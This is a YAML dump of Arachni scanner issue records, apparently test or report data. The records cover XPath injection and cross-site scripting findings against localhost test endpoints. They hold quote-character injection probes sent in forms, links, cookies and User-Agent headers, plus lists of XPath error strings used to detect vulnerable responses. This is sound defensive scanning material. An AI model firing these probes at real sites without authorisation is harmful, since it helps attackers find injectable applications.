      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value'"
      :injected: cookie value'"
      :combo: 
        cookie2: cookie value'"
      :action: http://localhost:13845/java/cookie/append
      :verification: false
      :id: XPathException
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: XPathException
    regexp_match: XPathException
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      XPathException
      Unknown error in XPath
      org.apache.xpath.XPath

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/java/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: header
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/java/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'"
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "61"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: XPathException
    injected: arachni_user'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: XPathException
      :match: XPathException
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'"
      :injected: arachni_user'"
      :combo: 
        User-Agent: arachni_user'"
      :action: http://localhost:13845/java/header/append
      :verification: false
      :id: XPathException
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: XPathException
    regexp_match: XPathException
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      XPathException
      Unknown error in XPath
      org.apache.xpath.XPath

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/java/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: form
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/dotnet/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "116"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: MS.Internal.Xml.
    injected: default'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: MS.Internal.Xml.
      :match: MS.Internal.Xml.
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: input
      :element: form
      :params: 
        input: default'"
      :follow_location: true
      :injected: default'"
      :combo: 
        input: default'"
      :action: http://localhost:13845/dotnet/form/append
      :verification: false
      :id: MS.Internal.Xml.
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: MS.Internal.Xml.
    regexp_match: MS.Internal.Xml.
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      MS.Internal.Xml.
      error '80004005'
      Expression must evaluate to a node-set.
      <p>msxml4.dll</font>
      <p>msxml3.dll</font>

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/dotnet/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: link
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/dotnet/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "116"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: MS.Internal.Xml.
    injected: default'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: MS.Internal.Xml.
      :match: MS.Internal.Xml.
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: input
      :element: link
      :params: 
        input: default'"
      :follow_location: true
      :injected: default'"
      :combo: 
        input: default'"
      :action: http://localhost:13845/dotnet/link/append?input=default
      :verification: false
      :id: MS.Internal.Xml.
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: MS.Internal.Xml.
    regexp_match: MS.Internal.Xml.
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      MS.Internal.Xml.
      error '80004005'
      Expression must evaluate to a node-set.
      <p>msxml4.dll</font>
      <p>msxml3.dll</font>

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/dotnet/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: cookie
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/dotnet/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value'"
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "116"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: MS.Internal.Xml.
    injected: cookie value'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: MS.Internal.Xml.
      :match: MS.Internal.Xml.
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value'"
      :injected: cookie value'"
      :combo: 
        cookie2: cookie value'"
      :action: http://localhost:13845/dotnet/cookie/append
      :verification: false
      :id: MS.Internal.Xml.
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: MS.Internal.Xml.
    regexp_match: MS.Internal.Xml.
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      MS.Internal.Xml.
      error '80004005'
      Expression must evaluate to a node-set.
      <p>msxml4.dll</font>
      <p>msxml3.dll</font>

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/dotnet/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: header
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/dotnet/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'"
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "116"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: MS.Internal.Xml.
    injected: arachni_user'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: MS.Internal.Xml.
      :match: MS.Internal.Xml.
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'"
      :injected: arachni_user'"
      :combo: 
        User-Agent: arachni_user'"
      :action: http://localhost:13845/dotnet/header/append
      :verification: false
      :id: MS.Internal.Xml.
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: MS.Internal.Xml.
    regexp_match: MS.Internal.Xml.
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      MS.Internal.Xml.
      error '80004005'
      Expression must evaluate to a node-set.
      <p>msxml4.dll</font>
      <p>msxml3.dll</font>

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/dotnet/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: form
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/libxml2/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "56"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: libxml2 library function failed
    injected: default'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: libxml2 library function failed
      :match: libxml2 library function failed
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: input
      :element: form
      :params: 
        input: default'"
      :follow_location: true
      :injected: default'"
      :combo: 
        input: default'"
      :action: http://localhost:13845/libxml2/form/append
      :verification: false
      :id: libxml2 library function failed
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: libxml2 library function failed
    regexp_match: libxml2 library function failed
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      libxml2 library function failed
      xmlsec library function

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/libxml2/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: link
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/libxml2/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "56"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: libxml2 library function failed
    injected: default'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: libxml2 library function failed
      :match: libxml2 library function failed
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: input
      :element: link
      :params: 
        input: default'"
      :follow_location: true
      :injected: default'"
      :combo: 
        input: default'"
      :action: http://localhost:13845/libxml2/link/append?input=default
      :verification: false
      :id: libxml2 library function failed
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: libxml2 library function failed
    regexp_match: libxml2 library function failed
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      libxml2 library function failed
      xmlsec library function

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/libxml2/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: cookie
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/libxml2/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value'"
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "56"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: libxml2 library function failed
    injected: cookie value'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: libxml2 library function failed
      :match: libxml2 library function failed
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value'"
      :injected: cookie value'"
      :combo: 
        cookie2: cookie value'"
      :action: http://localhost:13845/libxml2/cookie/append
      :verification: false
      :id: libxml2 library function failed
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: libxml2 library function failed
    regexp_match: libxml2 library function failed
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      libxml2 library function failed
      xmlsec library function

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/libxml2/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "91"
  cwe_url: http://cwe.mitre.org/data/definitions/91.html
  description: XPath queries can be injected into the web application.
  elem: header
  internal_modname: XPathInjection
  method: GET
  mod_name: XPathInjection
  name: XPath Injection
  references: 
    OWASP: http://www.owasp.org/index.php/XPATH_Injection
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - xpath
  - database
  - error
  - injection
  - regexp
  url: http://localhost:13845/libxml2/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "91"
    cwe_url: http://cwe.mitre.org/data/definitions/91.html
    description: XPath queries can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'"
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "56"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: libxml2 library function failed
    injected: arachni_user'"
    internal_modname: XPathInjection
    method: GET
    mod_name: XPathInjection
    name: XPath Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: libxml2 library function failed
      :match: libxml2 library function failed
      :substring: 
      - "xmlXPathEval: evaluation failed"
      - SimpleXMLElement::xpath()
      - XPathException
      - MS.Internal.Xml.
      - Unknown error in XPath
      - org.apache.xpath.XPath
      - A closing bracket expected in
      - An operand in Union Expression does not produce a node-set
      - Cannot convert expression to a number
      - Document Axis does not allow any context Location Steps
      - Empty Path Expression
      - Empty Relative Location Path
      - Empty Union Expression
      - Expected ')' in
      - Expected node test or name specification after axis operator
      - Incompatible XPath key
      - Incorrect Variable Binding
      - libxml2 library function failed
      - xmlsec library function
      - error '80004005'
      - A document must contain exactly one root element.
      - Expression must evaluate to a node-set.
      - Expected token ']'
      - <p>msxml4.dll</font>
      - <p>msxml3.dll</font>
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'\""
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'"
      :injected: arachni_user'"
      :combo: 
        User-Agent: arachni_user'"
      :action: http://localhost:13845/libxml2/header/append
      :verification: false
      :id: libxml2 library function failed
    references: 
      OWASP: http://www.owasp.org/index.php/XPATH_Injection
    regexp: libxml2 library function failed
    regexp_match: libxml2 library function failed
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      libxml2 library function failed
      xmlsec library function

    severity: High
    tags: 
    - xpath
    - database
    - error
    - injection
    - regexp
    url: http://localhost:13845/libxml2/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onload
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "403"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onload
      :id: <a href="/" onload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
